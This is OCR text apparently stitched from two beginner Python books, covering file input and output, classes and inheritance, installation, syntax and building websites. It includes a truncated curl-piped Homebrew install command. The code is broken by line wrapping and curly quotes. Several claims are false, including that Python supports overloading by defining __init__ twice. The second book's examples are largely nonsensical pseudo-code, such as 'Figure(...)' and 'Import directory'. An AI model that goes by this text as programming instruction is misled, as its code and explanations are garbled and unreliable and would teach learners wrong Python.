See how elegant that is? I"m going to

change my code to that, actually. The
only reason we did the other is to
demonstrate that you can assign the
return value of a function to a variable.
Anyway, after we"ve gone through all
the rooms and calculated their square
footage, we need to print out the total
square footage. This is super easy. You
know how we"ve been inserting values
into formatted strings? Well, since
addRooms() returns a value, we can just
go ahead and do that!
print “\n\nTotal square footage is:\t%d” %
By the end, your code should look like
rooms = []
def calculateArea(length, width):
print "\nRoom square footage: %d" % (length * width)
return length * width def
addRooms(roomList) : sqft
for room in roomList:
sqft += room
return sqft
roomCount = int(raw_input("How many rooms does
the house have? "))

for i in range(roomCount):
length = int(raw_input("\nWhat is the length? "))
width = int(raw_input("\nWhat is the width? "))
rooms.append(calculateArea(length, width)) print
"\n\nTotal square footage is:\t%d" %

Go ahead and save and test it out. If

everything works out, then you"ve got
yourself a full -fledged adding machine,
my friend. That"s cause for celebration
in my eyes.

One of the most integral parts of
programming is file input and output.
This fundamental activity has so many
varied uses that it"s really impossible to
pin down its usefulness in any mild
sentiment. You can save progress, import
and export data, do such a variety of
things really that it"s absurd.

File import and export is such an

integral part of so many applications.
Word processing, for example - every
time you save or open a file, you"re
exporting or importing data. Every time
that you save a video game, you "re
exporting data about your current
position in the game world, your current
health and inventory, all of that. It"s such
a deeply useful system that it"d be nigh
sacrilegious to somehow pass it up in
the scope of this book.

What"s more is that Python ma kes it

incredibly easy. How cool is that? A lot
of languages make it terribly
complicated, but not Python, no sirree.

First, let"s talk about opening a file.

Opening Files

Writing files is very straightforward in

Python. Every interaction with a file, be
it reading or writing or appending, in
Python occurs through the open method.
This method returns a File object, which
can then be manipulated. The open
method is spectacularly well -rounded,
as well as easy to use. It takes two
variables: the file name, an d the
interaction mode.

There are four main interaction modes

you need to know about:
Operator Meaning Description
“w” Write mode Erases file, writes from
“r” Read mode Can only read file.

“r+” Read/write mode

User must position self - can read/write.

“a” Append mode Adds content to an

existing file.
You don"t have to specify an interaction
mode, however. If you fail to specify an
interaction mode, it will default to the
read-only mode.

The way to open a file is something

along t he lines of this: f = open(“file.txt”,
Let"s work with this a little bit. Go
ahead and create a new file, call it
What we"re going to do in this set of
code is create a file that has numbers
from one to ten. Simple enough, no?

The first thing we want to do in this file

is create our file object variable. Just
like a second ago, let"s call it f. We"re
going to call our file example.txt and
we"re going to open it with write-only
f = open(“example.txt”, “w”)

Now we just have to make our l oop. In

order to write to the file, we"re going to
use the file method write(), which
accepts an argument of a formatted
for i in range(10): f.write(“%d\n” % (i + 1))

Then, when we"re done with a certain

file, we always, always have to close it.
Not doing so can lead to glitchy
programs, resource leaks, and even
corrupted files. Not a good set of things
to have happen to your user. Let"s just
avoid that altogether. We close files by
calling the close() method.
By the end of it, your modest lil" chunk
of code should look something like this:
f = open(“example.txt”, “w”) for i in range(10):
f.write(“%d\n” % (i + 1)) f.close()

Save this and run it. In your sidebar on

Atom, you should see a little file called
example.txt open up. Click it an d view
its contents. You should see the numbers
1 through 10! Perfect.

Now we"re going to feed these back in

using Python"s interface for file reading.
Below that chunk of code, we"re going
to open example.txt again, but this time,
we"re going to use read-only mode.

We"re going to go ahead and open it

f = open(“example.txt”, “w”)

Now, we want to go through it line by

line. We talked about how exactly this
works when we were talking about for
loops earlier. That whole spiel about
iterating through a file line-byline
remains relevant here. So let"s do what
we talked about earlier:
for line in f:

Easy enough, right? Now we"re going to

print the data from every line of the text
file, but we"re going to multiply it by 3.
The first thing we have to do i s another
integer cast, since every line read from
the text file is read as a string. We"d do
that like so:
line = int(line)
Now we"re going to print line multiplied
by 3. print “%d” % (line * 3)
See? Super easy to do, super intuitive
too. Last thing we "ve got to do is close
the file.
Save the program and run it again. Your
output should look very similar to this:
user@userpc:~/Python$ python 3 6 9 12 15 18
21 24 27 30
See how easy that all is? Python makes
working with files an absolute cinch. It"s
really sort of impressive. Other
languages tend to make it a tad more
convoluted, but Python - per usual
- comes around and makes the whole
process incredibly easy.

So, we"ve talked a bit about how the

variable f was a “file object”. But what
does object really mean?
That"s the kind of question that we"re
going to tackle in the upcoming chapter.

Back in the day, programming was a lot
less straightforward than it is today. The
modus operandi used to be something
called procedural programming, which
meant that your program just ran, start to
end, with very little room to change or
modify it overtime, and it was often
easier to just write your code all over
using some of the logic from the
previous set of code than to rework the
code that you already had. Making one
or two changes had the possibility to
create a number of issues in your
program that would take seemingly
forever in order to fix.

This all changed when the concept of

object -oriented programming came
along. The charge was led by a language
called Ada, named after Ada Lovelace,
one of the mothers of modern computing.
In the 80s, the procedural language C
was updated by a guy named Bjarne
Stroustrup to add classes, which we"ll
get to momentarily. This was a h uge part
in the shift towards object oriented
programming. C++ was actually a bit of
a bridge, as it allowed for both the
procedural and the object-oriented
paradigms. Then along came a little
language you may have heard of called
Java. Java was, for lack of a better term,
an absolute game changer. There"s a
reason that Oracle, the company which
created and maintained Java (then
known as Sun), is worth billions today.
Java caught on for a few reasons. The
first of these is that it was extremely
portable. It ran within a virtual machine
and was an interpreted language as
opposed to a compiled language, which
meant that there was a lot of abstraction
between Java and the lower levels of the
machine. It also meant that a code
written on a Windows system could be
run on a Macintosh, Unix, or Linux
system. Writing in Java enabled your
code to reach a lot more people.

The second reason is because it was the

first programming language to allow
much interactivity with webpages.
Scripting languages had hardly been de
veloped, so Java was often embedded
into webpages. This use occasionally
fell to the wayside after the development
of ECMAScript/JavaScript, and has
fallen to the wayside even moreso with
the development of other languages like
Python, Ruby, and Lua. Regardless, for
its time in the embryonic world wide
web, it was a huge deal.

The other reason is that it was the first

major language to solely support an
object-oriented paradigm. Everything
was contained within a class, no matter
what. Pieces of programs were much
easier to bind together than ever before,
and it all around was just a huge step
forward for making programming less
esoteric and more approachable and less

So what is object-oriented programming

exactly? We"ll get into the specific
concepts underlying object-oriented
programming in the next chapter, but it"s
all based around the idea of classes and

A class is a concept which is made up a

lot of little characteristics. For this
chapter and the next, we"re going to go
ahead and use cars as our example. A
car could be an example of a class.
Every car has doors, windows, a
windshield, and a horn. A class is a way
of putting all these little pieces of data
and these functions together into one

An object is an instance of a class.

What this means is that Car may be the
broad concept, but my car and my
friend"s car are two different instances
of this.

Understanding how classes are built and

what exactly goes into them makes a tad
more sense when you see how a class is
declared in Python.

Every class definition in Python is like

class className(parent
class): def init ():
relevant class variables
We"ll talk about parent classes in the
next chapter, but for right now, all you
need to know is that every class which
isn "t derived from another class has
object in place of their parent class.

So let"s say we wanted to make a

vehicle class. What do all vehicles have
in common? They all have doors. They
have a make and model. They have a
production year. They all have a horn.
They all either have air conditioning or
they don"t, which could be a boolean
variable. That"s a decent enough place
to start.

Let"s go ahead and define our vehicle

class to start: def Vehicle(object):
Alright, so now we need to talk about
initializer f unctions before we make
them. Initializer functions are used
whenever you create a new instance of
an object. Remember how we created an
instance of the file object earlier and
gave it the variables filename and
interaction-mode? This works similarly.
We can have it so that we actually send
arguments when we defined a version of
the object.

So let"s look at the variables we talked


- doors
- make, model
- production year
- air conditioning

We can throw those in our initializer

function and have them defined for each
instance of the class. We"re also going to
assume we"re working only with 4 -door
cars for now, because I have a point to
make here in a few paragraphs. Anyway,
let"s start add the arguments for
make/model, production year, and air
conditioning to our initializer function,
and actually code the thing. We also
have to add the self argument first and
foremost, because, well, Python. The
exact reasoning is beyond the scope of
this book.
def init (self, makeAndModel, prodYear,
Now here"s what we do:
self.makeAndModel = makeAndModel self.prodYear
= prodYear
self.airConditioning =
airConditioning self.doors = 4

The first three take arguments defined

when the object is created, and the last
one is defined by default. Good stuff,
super easy.
Now, before we finish up this class,
let"s add a cute little method called
“honk” which just prints out the phrase
“honk honk!”.

With every class function, you have to

give self as an argument:
def honk(self):
After that, we just have to print what we
want to print: print “%s says: Honk! Honk!” %

Now let"s go into our main code and test

this out. Make a new instance of the
vehicle class. Mine will be a 2004
Pontiac Grand Am.
grandAm = Vehicle(“Pontiac Grand Am”, 2004, True)

There we go. Now you have an instance

of your own class! Woo! Let"s test that
this works by calling the Vehicle method
“honk” right below our object
Save this and run. It should go pretty
flawlessly and print out exactly what we
expect it to.
But let"s say we had a sporty Grand Am,
and it only had 2 doors? What could we
This is very simple. Just access the
grandAm object"s doors variable and
set it to 4.
grandAm.doors = 2
Now test this by printing it out: print “My
car has %d doors.” % grandAm.doors

Everything go well? Fantastic. In the

next chapter, we"re going to build on
these a bit, but we"ll mainly be talking
about bigger OOP concepts.

So we"ve made it this far, all the way to
the l ast chapter. Man. That"s pretty
awesome. There are just a few more
things we need to talk about before we
wrap this book up. We"re going to look
at the four concepts of object -oriented
programming and how they apply to


The first major concept is called

“inheritance”. This refers to things being
able to derive from another. Let"s take
sports cars for instance. All sports cars
are vehicles, but not all vehicles are
sports cars. Moreover, all sedans are
vehicles, but all vehicles are not sedans,
and sedans are certainly not sports cars,
even though they"re both vehicles.

So basically, this concept of Object -

Oriented programming says that things
can and should be chopped up into as
small and fine of precise of concepts as

In Python, this is done by deriving


Let"s say we had another class called

SportsCar. Create a new file called and recreate the car class from
the last chapter.
class Vehicle(object):
def init (self, makeAndModel, prodYear,
self.makeAndModel = makeAndModel

self.prodYear = prodYear self.airConditioning =

airConditioning self.doors = 4 def honk(self):
print "%s says: Honk! Honk!" % self.makeAndModel

Now, below that, create a new class

called SportsCar, but instead of deriving
object, we"re going to derive from
class SportsCar(Vehicle)
def init (self, makeAndModel, prodYear,
self.makeAndModel = makeAndModel self.prodYear
= prodYear
self.airConditioning =
airConditioning self.doors = 4
Leave out the honk function, we only
need the constructor function here. Now
declare a sports car. I"m just going to go
with the Laferrari.
ferrari = SportsCar(“Ferrari Laferrari”, 2016, True)
Awesome. Now test this by calling
and then saving and running. It should go
off without a hitch.

Why is this? This is because the notion

of inheritance says that a child class
derives functions and class variables
from a parent class. Easy enough
concept to grasp. The next one is a little

The idea of polymorphism is that the
same process can be performed in
different ways depending upon the needs
of the situation. This can be done in two
different ways in Python: method
overloading, and method overriding.

Method overloading is defining the

same function twice with different
arguments. For example, we could give
two different initializer functions to our
Vehicle class. Right now, it just assumes
a vehicle has 4 doors. If we wanted to
specifically say how many doors a car
had, we could make a new initializer
function below our current one with an
added doors argument, like so (the
newer one is on the bottom):
def init (self, makeAndModel, prodYear,
self.makeAndModel = makeAndModel
self.prodYear = prodYear
self.airConditioning = airConditioning self.doors = 4
def init (self, makeAndModel, prodYear,
airConditioning, doors):
self.makeAndModel = makeAndModel
self.prodYear = prodYear
self.airConditioning =
airConditioning self.doors = doors

Somebody now when creating an

instance of the Vehicle class can choose
whether they define the number of doors
or not. If they don"t, the number of doors
is assumed to be 4.

Method overriding is when a child

class overrides a parent class"s function
with its own code.
To illustrate, create another class which
extends Vehicle called Moped. Set the
doors to 0, because that"s absurd, and
set air conditioning to false. The only
relevant arguments are make/model and
production year. It should look like this:
class Moped(Vehicle):
def init (self, makeAndModel, prodYear):
self.makeAndModel =
makeAndModel self.prodYear =
prodYear self.airConditioning =
False self.doors = 0

Now, if we made an instance of the

Moped class and called the honk()
method, it would honk. But it"s common
knowledge that mopeds don"t honk, they
beep. So let"s override the parent
class"s honk method with our own. This
is super simple. We just redefine the
function in the child class:
def honk(self):
print “%s says: Beep! Beep!” % self.makeAndModel

I"m part of the 299,000,000 Americans

who couldn"t name a make and model of
moped if their life depended on it, but
you can test out if this works for yourself
but declaring an instance of the Moped
class and trying it out.


The next major concept in obje ct-

oriented programming is abstraction.
This is the notion that the programmer
and user should be far from the inner
workings of the computer. This has two

The first is that it decreases the inherent

security risks and the possibility for
catastrophic system errors, by either
human or otherwise. By abstracting the
programmer from the inner workings of
the computer like memory and the CPU
and often even the operating system,
there"s a low chance of any sort of
mishap causing irreversible damage.

The second is that the abstraction

innately makes the language easier to
understand, read, and learn. Though it
makes the language a tad bit less
powerful by taking away some of the
power that the user has over the entire
computer architecture, this is traded
instead for the ability to program quickly
and efficiently in the language, not
wasting time dealing with trivialities
like memory addresses or things of the

These apply in Python because, well,

it"s incredibly simple. You can"t really
get down int o the nitty gritty of the
computer, or do much with memory
allocation or even specifically allocate
an array size too easily, but this is a
tradeoff for amazing readability, a highly
secure language in a highly secure
environment, and ease of use with
programming. Compare the following
snippet of code from C:
#include <stdio.h> int main(void) { printf(“hello
world”); return 0; }

to the Python code for doing the same:

print “hello world”
# That"s it. That"s all there is to it.

Abstraction is generally a net positive

for a large number of applications that
are being written today, and there"s a
reason Python and other object-oriented
programming languages are incredibly


The last major concept in object -

oriented programming is that of
encapsulation. This one"s the easiest to
explain. This is the notion that common
data should be put together, and that
code should be modular. I"m not going to
spend long explaining this because it"s a
super simple concept. The entire notion
of classes is as concise of an example as
you can get for encapsulation: common
traits and methods are bonded together
under one cohesive structure, making it
super easy to create things of the sort
without having to create a ton of super
specific variables f or every instance.

Welp, there we go. We finally made it to
the end of our little Python adventure.
First, I"d like to say thank you for
making it through to the end of Python
for Beginners: The Ultimate Guide to
Python Programming. Let"s hope it was
informative and able to provide you with
all of the tools you need to achieve your
goals, whatever they may be.

The next step is to use this knowledge.

Whether it be as a hobby or as a career
move, by learning the basics of Python,
you just made one of the best decisions
of your life, and your goal now should
be finding ways to use it in your day -to-
day life to make life easier or to
accomplish things you"ve wanted to
accomplish for a long while.
Finally, if you found this book useful in
any way, a review on Amazon is always

There are few better pursuits you could
undertake than learning to program. Not
many things will benefit you as directly
as programming will. This book will
teach you how to go from setting up your
Python environment to working with
complex object-oriented concepts, all in
a matter of no time. If you want to learn
Python quickly but still have an
impressive grasp on it, this just might be
the book for you.
If you"re on the edge of learning Python,
I sh ould just say that programming is the
only form of self -expression that allows
the end user to directly interact with
your art. Programming is a science, but
it"s also an art. In this book, you"re
going to learn how to start to use this
hugely dynamic language in order to
make computers do what you want them
to do.

Whether you"re learning to program as a

career move, as a hobbyist, or as
somebody just looking to dabble in
computer programming, learning
programming is ultimately one of the
best moves you"ll ever make for
yourself. It"s my goal in this book to
ensure that you are an able Python
programmer in no time at all. There are
many books about Python programming
on the market, but there are few that will
cater so kindly to helping you get on
your feet i n Python and helping you feel
like you know the language inside and
out in no time at all. This is one of them.
Python for Beginners
The Ultimate Guide to
Python Programming
Joshua Welsh
Copyright 2016 by Joshua Welsh - All rights

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TWELVE: Python…. A snake or a
program..............1 Installing Python To
Your Computer .. 5 The Basics Of
Python................................11 How To Use
Python In Different Ways

Designing A Website With Python.....26
The Many Versions Of Python.............35
Python and Java....What are the

Series Setup ..............................................45

Detail And Data Input…How Do You
Accept Them? ...........................................49
If Reports .................................................. 53
Errors And Exceptions.......................... 57
Tips And Tricks For Python...............62
Math In Python ........74

Congratulations on downloading Python
Programming and thank you for doing

The following chapters will discuss the

techniques that you are going to use
when you get started with programming
in Python. Python is a program that is
going to be one of the best programs to
start with when you are wanting to learn
how to write programs.

Programming is not easy, so you are

going to need to be patient with your
programming or else you are going to
end up messing up and having to go back
and redo everything all the time which is
going to result in you most likely
wanting to quit before you finally get
into the meat of the program.

There are plenty of books on this subject

on the market, thanks again for choosing
this one! Every effort was made to
ensure it is full of as much useful
information as possible; please enjoy!

Python is a code that you are going to
write with on any computer that you so
desire to use. The only thing that the
computer is going to need is the ability
to write code. As it was said in the
introduction, Python is a great
programming language to start with
because it is easy to read and write for
the developer. So, if you have to give the
code that you have written to another
programmer, they are going to be able to
fix it and even keep writing on it without
having to worry about screwing up the
code because it is not going to be hard
for them to understand what it is that you
are wanting to do.

It is easy to only think of the snake when

you hear the word Python because let"s
face it. The snake is huge, and it can kill
you without much thought. However, the
program Python was created after a
comedy show that the developer of the
program enjoyed watching.
The program is going to be easy to work
with since it is available across many
computers and is not going to force me
to convert my code just because I am on
a different computer. Not just that, but
when I write with Python, I am going to
pretty much be doing the same thing I
would be if I was writing data what was
going on in my head on a piece of paper.
Python is extremely user-friendly and
makes it to where you do not have to do
too much work to get the data input that
you desire.

Sometime in the 90"s a team stepped up

and decided that they would monitor the
program and find any bugs that were
hiding data in the code. Because of this,
support that I need is going to be easily
available on the Python website which is
kept up to date by the Python Software
Python like most other programs comes
in different versions and even has
different program versions of Python for
those who prefer to use programs such
as Java. Python has also made it to
where there is a C# language that is
written much like Python and works the
same except that it is in a different

There is one primary language that

Python uses when it is trying to interpret
code. While you can use other languages
to write code in Python, they are all
going to interact with the primary
language so that it is simple for
developers to use. The PyPy project was
created so that other developers can help
make the program better for those who
are using it and those who want to use it
in the future.

Anything that I can save on my computer

is going to be able to be put into Python
for processing.

A lot of the websites that we use on an

everyday basis are going to be
developed with Python. They do not
even have to be websites that we use
because there are a lot of government
and non-profit websites that are used
and developed by Python.

Since Python is a language that has to be

interpreted, I will not have to have any
other programs open like if I was
working with a different language.
Python was made to be a nomenclature
program so that everything you need to
work with the program is in the program.

Python is unlike any other language that

you are going to work with. The
commands are different, and the program
even runs differently.

Python in the real world

There are jobs data there in the real

world that you are going to be able to
use Python for. Things such as
developing web pages, creating
artificial intelligence devices, working
with databases, and making video
Each section that you are able to use
Python with is going to be a different
level of Python use, but it is all going to
work the same.

In order to use Python, you are going to
need to download it if you have not
already. You are going to want to get the
latest version of Python which is 2.7
from the Python website. This will
ensure you are getting the correct

In order to make sure that you get the

version that is the most up to date, click
on downloads, go to appropriate
hyperlink which can be located on

An MSI package will provide the

Windows download. If you want a
customized install, you will click on the
file. Python comes with a package that
allows for the administrator of the
system to install Python to their liking by
using their tools. However, you cannot
get past the directory that will be placed
on your system that has the version
number on it.
By design, python installs a directory
with the version number embedded into
it. For example, python version 2.7 will
install as C:\Python27\. You are able to
download any of the older or newer
versions of python and not have to ever
worry about a version conflict. There
can only be a single interpreter for your
application that works with all of the
files you put through Python. Your
variable that is in place for the
environment is not going to be
automatically modified. Therefore, you
are always going to have control of
which version of Python is being used.

If typing the full path name for the python

every time feels tedious, do not worry;
you are able to add the directories for
your default python version to the PATH.
Therefore, if your python installation is
in C:\Python27\, then you can add this to
your PATH:


Running Powershell is going to be one

of the easiest ways that makes it to
where you do not have to constantly type
the path file out.


A second directory script will any

commands that you place into it and will
only install what you tell it to install.
Now you are going to be able to use
Python without having to install anything
else. But, it is strongly recommended
that you install the tools and libraries
before you start to build python
applications that are going to be used in
more often. Setup tools will make it
easier for you to be able to use Python
along with the third party libraries that
are going to be at your disposal.

Mac OS X:

When using Mac, you will not need to

worry about anything else needing to be
installed with Python. However, it is
recommended that you install the tools
and libraries much like you would have
if you were using Windows.

The most up to date version that works

with OS X, will make a great learning
opportunity how to use python, however
it is not good for development. That is
due to the version that is available not
being up to date with where Python
currently is on their release schedule.

Before you install the up to date version,

you are going to GCC has to be installed
first! GCC will be placed on your
system by installing XCode, a smaller
Command Line Tool This will require
you to have an Apple account. If you do
not want GCC, then you can download
the installer package that is open thanks

Note: if XCode is already on your

computer, then you do not need to get
OSX-GCC. . Having both programs will
cause a conflict while trying to run on
your computer. Also, if you install
XCode for the first time or as a reinstall,
make sure that you have the command
line tools by following the on screen

There are plenty of UNIX utilities that

are going to be at your disposal thanks to
the OSX install. In the event that you
have worked with Linux before, then you
are going to come to realize that there is
a single component missing. There is no
decent package manager. However, you
are going to be able to fix this by
installing Homebrew onto your system.
Open either your favorite OSX terminal
emulator or Python Terminal so you can
run this command:

$ /usr/bin/ruby -e "$(curl -fsSL

The code that you are working with is

going to make sure that you understand
any changes that are going to be made
before you actually put the program on
your computer. After the installation is
done, you will now insert your new
Homebrew directory at the top of the
PATH environment variable. This can be
done using this command:


At this point you can now install Python

2.7 with the $ brew install python
command and then you will have
everything installed and ready for use in
just a few minutes.


Version 2.7 is one of the many of the

latest versions available on the Linux
system. You can however check to see
what Python version you have using the
$ python –version command.

The older versions of RHEL and CentOS

are going to come with Python 2.4
instead. However, there are extra
packages for enterprise Linux from the
Python website that can be downloaded.

Setup tools + Pip:

Setup tools extends the packaging and

even the installation facilities that are
provided by the details in the standard
library and is one of the most important
third-party tools that you are going to
need in order to use Python. Once you
have added in Setup tools, you will be
able to download and install any
compliant python software with a single
command. This also enables you to be
able to add this network installation
capability to your own python software
with very little work. You can also find
the latest version of Setup tools for
Windows by running the python script:
ex From here you will then
have a new command available to use:
easy_install. However, since many are
going to criticize the use of this and that
it is bad to use it, use the command pip
instead. Using Pip will allow you to
uninstall any packages and is actively
maintained unlike when you use

Now that you have Pip installed, with

the following python script:
Using this method will help with
installation when using a Mac OS X
computer. Pip will automatically install
in Linux centric python programs 2.7.9
and beyond as well as 3.4 and beyond.
In order to make sure that Pip is indeed
installed, run the command $ command -
v pip.

Virtual Environments:

The virtual environment is a tool that

will help you keep the directories that
you need with your projects apart so that
you are not geting them confused. This is
done through the creation of virtual
environments. In doing this, you will not
have to worry about problems like
“project X depends on version 1.x but,
project y needs 4.x”, and you can keep
your global site packages directory

Before you can start using Python, you
need to know the basics of Python and
this includes knowing the syntax of
Python. There will be similarities
between Python and other programming
languages, but there are going to be
differences as well.
When you are working with Python there
are several different modes, statements,
and various other things that make
Python unique. These are:

The Interactive Mode

Script Mode
Identifier Words
Reserved Words Lines
Multi-line statements
User interaction
Multi Statements on a single line
Blank lines
And the command arguments
Interactive Mode

Your interpreter is going to be invoked

without the need to set up a parameter by
passing the script file as that parameter.

Script Mode

At the point in time that you have

invoked your interpreter, the parameters
that you have set up for the script are
going to be carried out ensuring that the
code runs until it reaches the end.

Once the script is finished, then the

interpreter will no longer be active.

Any Python file that you work with

needs to end with .py so that you know
that it is a Python file along with Python
being able to run it properly without
converting any of the code.

Python Identifiers

Python has identifiers that are going to

be things such as the functions variables
and other objects that are going to need
to be verified before the program can be

Your identifiers have to start with either

a letter or an underscore. It cannot start
with a number because the program may
think that you are trying to do something

Punctuation cannot be used in identifiers

simply because the program is not going
to allow it.

Be specific with what you are doing

with Python. It is a case sensitive
program and if you put in a word one
way and then try and do it a different
way, you are going to be putting two
different words into the program. While
they are the same word to you, the
program sees them as two completely
different words.

When you put two underscores after your

identifier, it is known as a particular
When you are working with classes,
make sure that you are using uppercase
A private and secure identifier is going
to start with two underscores.
Single underscores indicate a private
Reserved Words
The reserved words will only be used
for variables or constants.
All of the reserved words are going to
be lowercased letters.
Not Or
Import Try
Lines and Indentation
A block is going to be the code that is
after the indention but before the next
Variables are going to tell you how many
spaces you need to indent your code.

A line of code that continues is going to

be indented the same number of times as
well so that the block is formed.

Multi-line statements
Typically, one statement ends and a new
statement begins on a new line.

When you are wanting Python to

continue a line, you are going to use a
backslash so that the program
understands that the line is going to keep
going even though it appears as though
the line has ended and a new one has

Brackets mean that the line is going to

keep going without the use of a
Quotation in Python
There are three types of quotes that are
accepted in Python. Double, single, and
triple quotes.
The quotation marks are going to tell you
where the code begins and where it

When you use a set of triple quotes, you

are usually telling the program that you
are wanting the code to go over several

Comments are going to be set aside by a
hash symbol

When a hash symbol is used, the

program is not going to execute what is
written there, it is just there for the
developer of the program

Comments can be on the same line as

your statements or expressions that are
going to be executed by the system.

The comments that you enter can cover

several lines if needed.
Blank lines
Blank lines or white spaces are going to
be treated like a comment is treated by

When your interpreter is not being used,

you will have to physically insert the
black line into your code in order to
terminate the multiline statement that you
have just created.

Waiting for User

You can create programs with Python

that are going to wait for the user of the
program to do a specific task before it
continues carrying out the code.

Multiple statements on a single line

A semicolon is going to allow for
several statements to be placed on the
same line.
You can only do this when your
statement does not start with a new
block of code.
Individual statements that are placed into
groups are known as suites.
Suites that are complex will require that
you use a header.
These header statements are going to
start with a keyword and then end with a
Command line arguments

There is a code inside of Python that

will allow you to understand how it is
that your Python code is going to be run
based upon the command that you have

In order to access this help, you will

type in – h –

You have installed Python on your
computer. Yay! Now you are going to
need to use it. But how are you going to
use Python? Python has so many different
ways that you can use it that you are
going to have several things that you can
choose from so that you can get the
results that you are wanting.

As you learn Python, you are going to

find that it is important to understand
how the program is going to work with
the commands that you put into the
program. If you do not understand how it
all works together, then you are going to
end up taking longer to write the code
that you have in Python.

Step one:

Open Python and insert the word Python

into the command prompt. You are going
to be able to press enter so that you can
force the interpreter to work so that you
can use it. Python should be moved into
the command prompt so that the
directory for Python invokes the
interpreter to work the way that it is
supposed to.

Step two:

Once the interpreter has been opened,

the most basic of equations can be
placed into the program. If you end up
seeing a pound sign, you are going to
have to reenter the code because the
program never accepted it.

Step three:

If I want to use the powers when I am

putting code into Python, I am going to
use double asterisks that way that Python
can be used for larger amounts than what
you may be used to working with.

Step four:

Variables are going to be tied to others

in Python when you are doing math. The
equals sign is going to be the symbol that
I use to assign variables to amounts.

Step five:
Once all the calculations have been
finished, the interpreter will be closed.
You can close it by entering quit() and
the program will be closed. The first
coding program
Step one:
The first program that you are going to
create is going to be the most basic of
programs that you are going to use. This
is going to show you how to use the
interpreter so that you can make sure that
it is working correctly.

Step two:

When you are entering codes into the

command prompt, you are going to enter
in figure and then the code that you want
to put into the interpreter.

Step three:
The program has to be tested to make
sure that it is working correctly. First I
am going to put in a title.
Figure( “This is going to be the title for
my program”)

Any announcement that I create in Python

is going to need to have a set of double
quotes placed around it so that the
program reads it correctly.

Step four:

Once the testing has been completed,

then I can save my program in order to
work on it later one. I am going to need
to make sure that I add on the extension
of .py to all of my Python related
documents so that I know that it is
Python and not a different language that I
could be working with.
Step five:

The command prompt is going to be

reopened and now I can reopen my
program once more. This is going to
ensure that everything is working
properly so that I can see if any code that
I enter into the program is going to be
run in the way that it is supposed to be

Programs that are more advanced

Step one:

There are going to be circumstances as

to how a program runs. The
circumstances that are set into place are
known as the control flow. The control
flow is going to be how I am going to be
able to create other programs that will
work the way that they are supposed to
depending on the circumstances I put
into place.

The while announcement is one of

easiest reports that I am going to be able
to write.
Step two:

Functions are going to be defined no

matter what function I am using. The
functions are going to need to have titles
so that they can be used later with the
programs that I am working with.

Step three:
The control flow is going to set up the
circumstances that are going to be the
premise of how the program will work.
They tell the program what it is and is
not allowed to do.

Step four:
The mathematical symbols that you
learned when you were learning math in
school are going to be used in Python as
Step five:

You can always learn more about Python

because the program is always evolving
thanks to those that are working to make
it the best program that is data there.
There are numerous things that you are
going to be able to do with Python and
creating a website is one of them. While
what I put into Python is not going to
always come data the way that I want it
to come data the first time, I am going to
be able to use it as a temporary program
for any project that I decide to make
with Python that way that the final
project is going to be the way that I want
it to be in the end.

Google is one website that has been

made with Python therefore it is easy to
read and understand for programmers
and it is easy to use for their customers.

Be sure that you are always saving your

work! If you cannot write an entire
program in one setting, then you need to
save it somewhere else on your
computer so that you can get to it later. It
is recommended that your project be put
somewhere where you are going to be
able to get to it in the event that your
computer crashes and you cannot
retrieve the files on your hard drive.


Import directory
Program = directory ( _title of
the directory_)
Theprogram.path („/")
Determine first page():
Result “the title of the directory is going
to end up here”
The _title of the directory_ == „_end of
the code_": (fix = this is going to be

by the program)

The directory that is imported is going to

always be the first line of code so that
the program knows what it is doing and
the code that you are entering is running
off the correct frame and not the default
one. In the event that what you are
wanting to import is not installed, you
are going to receive an error code. This
is where you are going to have to install
the library so that your program works

To install the directories that you need

you are going to need to insert the pip
install into the command prompt. It will
then be installed and the website that you
created is going to run the way that you
want it to. By putting in localholder:
6000 will make sure that the website is
seen on the browser that is going to be
running it.

When you look at the website that you

have created, you are going to see that it
is working but it is not going to look like
any other websites that you have been on
before. You are going to need to use a
developer to create the website design
that you are wanting as long as the code
that you enter into the command prompt
works the way that it is supposed to.

Python needs to be able to handle any

request that you make of it and it needs
to take note of the amount of traffic that
you are going to be getting on your
website. Web pages are made
specifically for the amount of traffic that
you are going to get because if your
website is not stable, then it is going to
end up crashing cause the code is not the
way that it should be.
Python is going to help you create
multiple documents with the proper
directory in use. Once the framework is
loaded, Python is going to carry data the
code that you want carried data and it is
going to help you so that you can focus
on fixing your code to make sure that
your code works the way that you are
wanting it to.

Once the documents have been imported

and you can create a type so that you
have help in making your website.
New lines are going to be defined by the
functions that you use. You are going to
need to set series of code so that they
respond to the function the way that it is
supposed to. This will make sure that the
home page and other pages that are on
your website are going to look how you
want them look. Not only that, but they
are going to make sure that your website
directs people the way that you want
them to go.

You are going to need to change your

code up just a little so that your code
goes to the proper page. It does not
matter how many pages that you have on
your website, just as long as your code
is written in the way that you want it to

All of the code that is placed in the

primary function, you are going to write
it the same way that you always write
your code and it is going to be brought in
from external sources while you are still
working on the proper title page. If your
circumstances end up being satisfied,
you are going to now have complete
control over the script and the way that it
behaves. You are also going to control
how your users are going to interact with
the script that you have put into the

Your circumstances need to be found as

true and valid to ensure that you are not
going to have many errors placed in your
code. But, if there are errors, then you
are going to need to use a program that is
going to trace the errors back to where
the problem started. If the parameters
are invalid, then your code is not going
to run.

Most of what you see on a web page is

HTML, and the HTML is going to have
to be brought in from an external coding
source so that the plain words is
changed to HTML and brings users to
your page.

The HTML pages are going to respond

with a function that is known as

The different things that you want to

show up on my page will be done with
specific functions so that your page
becomes what you are wanting it to do.
Because Python is so versatile, you are
able to use multiple coding tricks.

HTML is going to be started in an empty

document and have the extension of .html
so that it is different than the Python
files. After the page, has been created,
you are going to be able to enter the
code that you want.

<!figure of document:
html> <html code>
<body of the code>
<heading one> “Words” </heading one>
<body> “words” </body>
</end of the code>
</html so that the program knows that
this is the end of the html>
There are some things about HTML that
you may find interesting for the web
pages that you create so that you are not
just putting in series of words that are
not pleasing for your users.

As you work with HTML you should


- Documents have to begin and end with

HTML so that the program understand
that it needs to change the code that you

- The documents for HTML have to start

with a declaration so that it can be
identified as to what kind of document
you are creating.
- When the code is not put between the
body tags, it is going to be placed as
JavaScript code or even CSS.

Moving back to the directory that you

are working with, folders are going to be
created to separate data the different
code figures that are in your document.
Any code that is not placed into the
correct frame, then it is going to stay in
Python code instead of being converted.

HTML code looks similar to the

directory code, but it works with HTML
instead of Python code.

Import directory, render_figure Program

= directory (_ words for whatever you
want your page to be titled_)
Directory.path( „/")
Explain data reach():
Result render_figure (datareach.html)
If _words_ == „_end of the code_":
Program.file (parameter = valid)

The version of the code that has been

updata is going to use the function that
we have talked about earlier. Now that
the HTML code is inside of the
framework like it is supposed to be, then
